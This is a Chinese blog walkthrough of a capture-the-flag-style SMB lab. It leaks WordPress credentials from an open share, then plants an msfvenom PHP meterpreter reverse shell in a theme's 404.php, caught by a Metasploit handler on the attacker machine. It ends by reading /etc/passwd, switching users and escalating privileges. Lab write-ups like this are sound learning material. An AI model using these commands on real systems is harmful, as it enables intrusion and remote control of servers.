SMB滲透

SMB滲透學習過程

1.SMB介紹

SMB(全稱是Server Message Block)是一個協議名,它能被用於Web連接和客戶端與服務器之間的信息溝通。SMB最初是IBM的貝瑞·費根鮑姆(Barry Feigenbaum)研製的,其目的是將DOS操作系統中的本地文件接口“中斷13”改造爲網絡文件系統。
百度百科
準備條件:kali 攻擊機:192.168.31.101
靶場: 192.168.31.62

2.探測過程

(1)使用netdiscover -r 192.168.31.1/24(子網掩碼)探測到局域網內的靶場地址爲:192.168.31.62
(2)使用nmap -sV 192.168.31.62(靶場地址)探測靶場開放的服務
nmap指令詳解
在這裏插入圖片描述nmap -A -v -T4 192.168.31.62在這裏插入圖片描述
針對smb協議弱點分析:使用smbclient -L 192.168.31.62
在這裏插入圖片描述
針對smb協議弱點分析
在這裏插入圖片描述
get deets.txt 到桌面,然後打開另一個終端,在桌面打開deets.txt

查看wp-config.php

cd/wordpress
get wp-config.php
gedit wp-config.php

在這裏插入圖片描述使用mysql嘗試連接

mysql 192.168.31.62 -u Admin -p
password : 粘貼密碼
ssh [email protected]
粘貼密碼

兩種方式都失敗

又因開啓了http協議則使用dirb http:192.168.31.62
找到wp-admin鏈接並打開
在這裏插入圖片描述
打開鏈接後使用賬號密碼登錄,登錄成功界面
在這裏插入圖片描述

製作webshell

在這裏插入圖片描述

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw

在這裏插入圖片描述
複製產生代碼到本地

gedit shell.php

在這裏插入圖片描述

 啓動監聽
msfconsole

在這裏插入圖片描述

設置參數
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (攻擊機地址)
run

在這裏插入圖片描述
啓動成功,等待連接
在這裏插入圖片描述
上傳webshell代碼

在這裏插入圖片描述
提交後瀏覽器輸入訪問點

192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php

連接成功:在這裏插入圖片描述

在這裏插入圖片描述在這裏插入圖片描述

cat /etc/passwd

在這裏插入圖片描述
發現togie用戶
切換到togie用戶,密碼爲12345

在這裏插入圖片描述
提升權限
查找flag
在這裏插入圖片描述
視頻教程鏈接

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章